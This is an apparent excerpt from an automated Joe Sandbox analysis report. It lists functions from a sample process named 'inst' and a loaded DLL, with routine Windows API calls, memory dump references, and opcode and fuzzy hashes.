                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalResourceSection$EnterFindLeaveLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1986744039-0
                                                                                                                                                                                                                      • Opcode ID: a53ee378557267651c04f189ec6898f0d25bccf40bc06f8ccb4c35798fa18183
                                                                                                                                                                                                                      • Instruction ID: 2ca75451f0a658c978679da244816537bd2fa8725718cfdafd3ed5d768cd7dd8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a53ee378557267651c04f189ec6898f0d25bccf40bc06f8ccb4c35798fa18183
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF02863B492293BA3319A666C40B77ABBEEEC07F6701813AFC49D3340DA119C0142F1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ABEBE1
                                                                                                                                                                                                                        • Part of subcall function 00ABDE99: __EH_prolog3.LIBCMT ref: 00ABDEA0
                                                                                                                                                                                                                        • Part of subcall function 00ABEB31: __EH_prolog3.LIBCMT ref: 00ABEB38
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                                                                      • Opcode ID: 59595c01f9d609d12b5e3b3d5cf9b4a06ac1ff1b330e369c33ecb7ec35bd21d9
                                                                                                                                                                                                                      • Instruction ID: c22c9df04d97bf6b08c2aa8916e0a1e421f74f3d6032a3b617711db6a25d9ccc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59595c01f9d609d12b5e3b3d5cf9b4a06ac1ff1b330e369c33ecb7ec35bd21d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6711E636801109AFDF06EFE4DE42AEEBB7AEF14310F104514F611A61A2DB359A25DB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A94BC2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                                      • Opcode ID: 019d27aa0c988e54cfc8a11014f9e016a4f71bc2ca12919284b5c94c237e4b73
                                                                                                                                                                                                                      • Instruction ID: a994149d6951a2749d977937d172072eaecbb79e5befd2ffb2d470584597022d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 019d27aa0c988e54cfc8a11014f9e016a4f71bc2ca12919284b5c94c237e4b73
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7811E171604705EFDB30AB28C845FD773F8AB08356F004829E19A87092E7B4E989CBD0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AC62D1
                                                                                                                                                                                                                        • Part of subcall function 00A96986: _wcschr.LIBCMT ref: 00A969AB
                                                                                                                                                                                                                        • Part of subcall function 00AC5F4D: __EH_prolog3_GS.LIBCMT ref: 00AC5F54
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3H_prolog3__wcschr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4028972141-0
                                                                                                                                                                                                                      • Opcode ID: 938d11921d527da63fae33a279d7efbc78d2b5d7dc679f50ad9be86ced535a5a
                                                                                                                                                                                                                      • Instruction ID: 6246f4685a8e843ba83155152c0824f7f5a066f67a88d985ab8bb9d63da53884
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 938d11921d527da63fae33a279d7efbc78d2b5d7dc679f50ad9be86ced535a5a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5019235384758E6D704EA60CE12FBD3274BF15712F12C11ABA069E2C1CFB08A41D7A2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00AFF4F9
                                                                                                                                                                                                                        • Part of subcall function 00AF98D1: __getptd_noexit.LIBCMT ref: 00AF98D1
                                                                                                                                                                                                                        • Part of subcall function 00AFA5B1: __decode_pointer.LIBCMT ref: 00AFA5BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3158947991-0
                                                                                                                                                                                                                      • Opcode ID: ba83ad8c6064a2c91b521744f896e3fe890138e88bf8eb251f58be113f18f249
                                                                                                                                                                                                                      • Instruction ID: a321871118a137e55f88a69fe6fe58fb0371c4402d57a9a3774a9ddc62cd2520
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba83ad8c6064a2c91b521744f896e3fe890138e88bf8eb251f58be113f18f249
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F0AF7180021DEFCF21BFE48D024AF7AB0BF04712F118565FA189A192D735CA61EB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C60C25C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                                      • Opcode ID: 585001bb78b6470ffa2670af58674b2ad1a01bbb4a34216b68d4841a47ed655b
                                                                                                                                                                                                                      • Instruction ID: 71489659f134dfd9c5062e87bc13e65618de53b490f24dd9ff60fa5f6b19e478
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 585001bb78b6470ffa2670af58674b2ad1a01bbb4a34216b68d4841a47ed655b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3F05E71318A00BFC3269B5AC900D97B7F8EBCB764B10892DE06AE6D10C230A441CF7A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AB236A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClientRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 846599473-0
                                                                                                                                                                                                                      • Opcode ID: b7dd7c5c04fdd184bf0ba3297ec794f99a60942a445af202957037d4d04e8cf4
                                                                                                                                                                                                                      • Instruction ID: 454da576dd43a9520d6c7e4dace8736c9662379405432c110da9075e10d67159
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7dd7c5c04fdd184bf0ba3297ec794f99a60942a445af202957037d4d04e8cf4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EF0F972800209EFCB10DFAEC9449AFFBFCFF94600F00445AA465E3211D6706A01CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,?), ref: 6C5E4CF0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                                                                      • Opcode ID: 697ffcde8ff92708f3af1ee7a531b15b7d7c2fad15f7d38ddfe03807d876ad40
                                                                                                                                                                                                                      • Instruction ID: 41ff1738b6398dc2e5c938681271966ee31455248415385a9dc094827f4cd72a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 697ffcde8ff92708f3af1ee7a531b15b7d7c2fad15f7d38ddfe03807d876ad40
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24F08C73205211AFC6119F99EC84C5BBBEAEFCC620B11890AF69697651CB30D819CB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00A88967
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 906285a1834f1f9b37b8f78c4cf303f02f18c65275dc4758934b38854fdad18b
                                                                                                                                                                                                                      • Instruction ID: 08afe2585092b644ad074d200486ce6b94b68168878d83ee6ab0183126cc8820
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 906285a1834f1f9b37b8f78c4cf303f02f18c65275dc4758934b38854fdad18b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3F0A47610120AEBDF159F81D801EEE7BA9EF48354F108019FD5156260EB76EE21DBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,?), ref: 00AC56A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                                                                      • Opcode ID: 432a1526114078b7457ae3c75a6686dea530edebb681aaf211703990519af287
                                                                                                                                                                                                                      • Instruction ID: b7af934a75e70d44b9ad459ce75c739237da839e8c58a0a8e50049fe8c3837f1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 432a1526114078b7457ae3c75a6686dea530edebb681aaf211703990519af287
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3F08273105211AFC211AF959C44C4FBBA9EFC87207154919F65687152C630D805CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AD03C6
                                                                                                                                                                                                                        • Part of subcall function 00A96986: _wcschr.LIBCMT ref: 00A969AB
                                                                                                                                                                                                                        • Part of subcall function 00AD0215: __EH_prolog3_GS.LIBCMT ref: 00AD021C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3H_prolog3__wcschr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4028972141-0
                                                                                                                                                                                                                      • Opcode ID: 155cd64f7a3b97114b7d3591465dd0f75333262288b2f001cf2bb8149b68b5ee
                                                                                                                                                                                                                      • Instruction ID: 7be1a4966da4f08e8f94929371d2de8be9f56fbc7416028d252f724a4abf40af
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 155cd64f7a3b97114b7d3591465dd0f75333262288b2f001cf2bb8149b68b5ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F08232501428ABCB15FFA4CE51FFE76559F51350F148124FA0A9F282CB309F8687C1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ABF083
                                                                                                                                                                                                                        • Part of subcall function 00ABEF1E: __EH_prolog3.LIBCMT ref: 00ABEF25
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                                                                      • Opcode ID: 571d8946c6413009ed6e7f2e29f53a16711fbd08c65d673dfd5e44d0b7d8c81a
                                                                                                                                                                                                                      • Instruction ID: 30cd8660a0873c7ddd58a9c0f4cbf2251c52532deab71afe0bde07020bf3aa14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 571d8946c6413009ed6e7f2e29f53a16711fbd08c65d673dfd5e44d0b7d8c81a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF02732942528AFCB11EFA08901BED37A1AF09721F084514FE545F2E7E7368A51AF81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3_catch
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3886170330-0
                                                                                                                                                                                                                      • Opcode ID: ba4d91f153587f770b308bf0c52b90235df3ea542e4995a144eef48e152b0b57
                                                                                                                                                                                                                      • Instruction ID: 531f5b2d9fd2f77b482e5677dc4ccf6784b69266751b62f829cfc0a39f69cd42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba4d91f153587f770b308bf0c52b90235df3ea542e4995a144eef48e152b0b57
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12F09A72D16300CBDB00DF68C8807AA77B8AF11719F16981AD085DB640DB70E9008BEE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A91634
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                                      • Opcode ID: 30a9ae385c7c21e423a2160221227aaea11a4edde2c41181c97f5f72caf49659
                                                                                                                                                                                                                      • Instruction ID: 4943596eb5a597a6241d8fa4c720bdc7efe342c9773f16887f3192c29f3f31eb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30a9ae385c7c21e423a2160221227aaea11a4edde2c41181c97f5f72caf49659
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF08C36A007018FDB24DB39E808BD273E9FB84367F15486EE1A6C7085D7B4D886CA90
